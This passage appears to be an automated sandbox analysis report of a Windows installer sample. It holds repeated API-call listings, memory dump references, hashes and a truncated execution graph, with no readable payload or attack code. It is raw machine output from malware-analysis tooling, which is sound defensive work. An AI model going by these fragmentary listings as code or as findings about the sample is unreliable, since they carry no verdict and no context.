                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                          • String ID: $@rD
                                                                                                          • API String ID: 3748168415-881980237
                                                                                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                          APIs
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcatwsprintf
                                                                                                          • String ID: %02x%c$...
                                                                                                          • API String ID: 3065427908-1057055748
                                                                                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                          APIs
                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                          • API String ID: 2266616436-4211696005
                                                                                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                          APIs
                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1599320355-0
                                                                                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                          • String ID: Version
                                                                                                          • API String ID: 512980652-315105994
                                                                                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 2102729457-0
                                                                                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 2883127279-0
                                                                                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                          APIs
                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                                          • String ID: !N~
                                                                                                          • API String ID: 623250636-529124213
                                                                                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                          Strings
                                                                                                          • Error launching installer, xrefs: 00405C48
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                          • String ID: Error launching installer
                                                                                                          • API String ID: 3712363035-66219284
                                                                                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                          • API String ID: 3509786178-2769509956
                                                                                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_installer_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 190613189-0
                                                                                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:3.2%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:3.7%
                                                                                                          Total number of Nodes:2000
                                                                                                          Total number of Limit Nodes:67
                                                                                                          execution_graph 102407 e817c8 102408 e817df 102407->102408 102410 e3d2a0 102408->102410 102411 ea3fe1 81 API calls __wsopen_s 102408->102411 102411->102410 102412 e3f4c0 102415 e4a025 102412->102415 102414 e3f4cc 102416 e4a046 102415->102416 102417 e4a0a3 102415->102417 102416->102417 102424 e40340 102416->102424 102419 e4a0e7 102417->102419 102451 ea3fe1 81 API calls __wsopen_s 102417->102451 102419->102414 102421 e8806b 102421->102421 102422 e4a077 102422->102417 102422->102419 102447 e3bed9 102422->102447 102444 e40376 messages 102424->102444 102425 e505b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102425->102444 102426 e50568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102426->102444 102427 e8632b 102466 ea3fe1 81 API calls __wsopen_s 102427->102466 102429 e41695 102434 e3bed9 8 API calls 102429->102434 102441 e4049d messages 102429->102441 102430 e5014b 8 API calls 102430->102444 102432 e85cdb 102439 e3bed9 8 API calls 102432->102439 102432->102441 102433 e8625a 102465 ea3fe1 81 API calls __wsopen_s 102433->102465 102434->102441 102437 e3bed9 8 API calls 102437->102444 102439->102441 102440 e3bf73 8 API calls 102440->102444 102441->102422 102442 e50413 29 API calls pre_c_initialization 102442->102444 102443 e86115 102463 ea3fe1 81 API calls __wsopen_s 102443->102463 102444->102425 102444->102426 102444->102427 102444->102429 102444->102430 102444->102432 102444->102433 102444->102437 102444->102440 102444->102441 102444->102442 102444->102443 102446 e40aae messages 102444->102446 102452 e41e50 102444->102452 102462 e41990 207 API calls 2 library calls 102444->102462 102464 ea3fe1 81 API calls __wsopen_s 102446->102464 102448 e3befc __fread_nolock 102447->102448 102449 e3beed 102447->102449 102448->102417 102449->102448 102471 e5017b 102449->102471 102451->102421 102455 e41e6d 